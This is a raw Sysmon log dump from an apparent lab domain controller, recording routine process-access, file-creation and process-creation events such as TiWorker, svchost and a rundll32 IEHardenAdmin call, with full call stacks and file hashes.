12:02:23.565{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.534{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.534{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.440{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA6E9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.440{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.440{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.425{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.425{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.409{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.409{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+f539d|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.423{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenAdminC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x80000000000000005830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.284{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.269{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.269{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.253{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.253{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 11241100x80000000000000005825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Downloads.lnk2021-03-31 10:51:16.250 23542300x80000000000000005824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\Links\Downloads.lnkMD5=859920D477EE7ED0174243DFF586E5E3,SHA256=1F8B2760E210762D02665D55224973A3EE73E43B7E0F5398AF35E86861B7CB50,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Desktop.lnk2021-03-31 10:51:16.250 23542300x80000000000000005822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\Links\Desktop.lnkMD5=D5CF13D810C697DFC19F42E6D44FE391,SHA256=CDE1DBC52A9ED24304BE4A6EB10EBDD3C80F7016F136519CA3504F04539988E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.144{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.144{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 